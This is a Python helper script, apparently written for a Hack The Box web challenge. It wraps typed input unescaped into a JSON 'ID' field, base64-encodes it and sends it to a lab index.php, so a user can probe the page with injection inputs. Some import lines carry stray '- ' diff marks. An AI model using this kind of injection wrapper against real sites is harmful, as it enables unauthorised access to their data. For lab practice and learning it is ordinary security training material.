- #!/usr/bin/env python3
- #requests is a good python way for us to get the page and manipulate web requests
- import requests
- #our hint at the bottom of the page says that we may need to be performing some base64 encoding
- import base64
- #parse out all the html and just show us content, makes usage of the program a little easier
- from bs4 import BeautifulSoup
- #used to get arguments and exit using system function
- import sys
- #library to help us close the program if keyboard interrupt is pressed
- import signal
- #Error Handling
- from builtins import ConnectionRefusedError
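# Interactive helper: wraps each line typed by the user in a small JSON
# object, base64-encodes it and sends it as the `obj` query parameter to
# index.php on the lab host, then prints the text of the returned page.
#
# The original paste compared the *builtin function* `input` with the string
# "exit" at module level. That comparison is always False, so the "Goodbye"
# branch could never run. The check now lives inside the prompt loop, where
# the typed value is actually available.

# Upper bound (seconds) for one HTTP round trip. Without a timeout,
# requests.get() can block forever on a host that accepts the connection
# but never answers.
REQUEST_TIMEOUT_SECONDS = 10

# Plain HTTP: the request and the response travel unencrypted.
TARGET_URL_TEMPLATE = "http://docker.hackthebox.eu:{0}/index.php"


def keyboardInterruptHandler(signum, frame):
    """SIGINT handler: print a short notice and leave the program.

    The first parameter is called `signum` so it does not shadow the
    imported `signal` module inside the handler.
    """
    print("\nKeyboardInterrupt detected. Exiting...")
    sys.exit()


def parse_port(raw):
    """Return *raw* as an int TCP port, or raise ValueError.

    The port comes from the command line and is placed into the request
    URL, so it is restricted to plain ASCII digits in the range 1-65535
    instead of being interpolated as an arbitrary string.
    """
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError(
            "Invalid port number: {!r} (expected an integer from 1 to 65535)".format(raw)
        )
    port = int(raw)
    if not 1 <= port <= 65535:
        raise ValueError(
            "Invalid port number: {!r} (expected an integer from 1 to 65535)".format(raw)
        )
    return port


def encode_payload(id_value):
    """Wrap *id_value* in the JSON object the page expects and base64 it.

    The value is inserted verbatim, with no JSON escaping, exactly as the
    original script did; a double quote or backslash in the input therefore
    changes the structure of the JSON text.

    The text is encoded as UTF-8 rather than ASCII. For ASCII input the
    bytes are identical, but a non-ASCII character no longer raises an
    uncaught UnicodeEncodeError that terminates the prompt loop.
    """
    unencoded = '{\"ID\":\"' + id_value + '\"}'
    encoded = base64.b64encode(unencoded.encode("utf-8"))
    # Base64 output is pure ASCII, so this decode cannot fail.
    return encoded.decode("ascii")


def fetch_page(port, payload):
    """Send *payload* as the `obj` query parameter and return the body text.

    The parameter is handed to requests via `params=` so it is
    percent-encoded. Standard base64 can contain '+', '/' and '='; pasted
    raw into a query string, a '+' is read as a space by form-style
    decoders and the value that reaches the server is corrupted.
    """
    response = requests.get(
        url=TARGET_URL_TEMPLATE.format(port),
        params={"obj": payload},
        timeout=REQUEST_TIMEOUT_SECONDS,
    )
    return response.text


def main():
    """Validate the command line, install the SIGINT handler, run the prompt loop."""
    # Exactly one argument (the port) is expected.
    if len(sys.argv) != 2:
        print("Usage: {} <port number>".format(sys.argv[0]))
        # Non-zero status so a calling shell can tell a usage error from success.
        sys.exit(1)

    try:
        port = parse_port(sys.argv[1])
    except ValueError as err:
        print(err)
        sys.exit(1)

    # Exit cleanly on Ctrl+C instead of dumping a traceback.
    signal.signal(signal.SIGINT, keyboardInterruptHandler)

    while True:
        try:
            oofValue = input("Query for ID param here: ")
        except EOFError:
            # stdin was closed (Ctrl+D or end of piped input).
            print("Goodbye")
            sys.exit()

        # Typing "exit" leaves the loop; this is what the unreachable
        # module-level check in the original was evidently meant to do.
        if oofValue == "exit":
            print("Goodbye")
            sys.exit()

        try:
            pageToParse = fetch_page(port, encode_payload(oofValue))
        except requests.exceptions.ConnectionError:
            print("Connection refused, check your port")
            continue
        except requests.exceptions.Timeout:
            # A read timeout is not a ConnectionError subclass, so it needs
            # its own handler now that a timeout is set.
            print("Request timed out after {} seconds".format(REQUEST_TIMEOUT_SECONDS))
            continue

        # Strip the markup and show only the text content of the response.
        outData = BeautifulSoup(pageToParse, 'lxml')
        print(outData.text.strip())


if __name__ == "__main__":
    main()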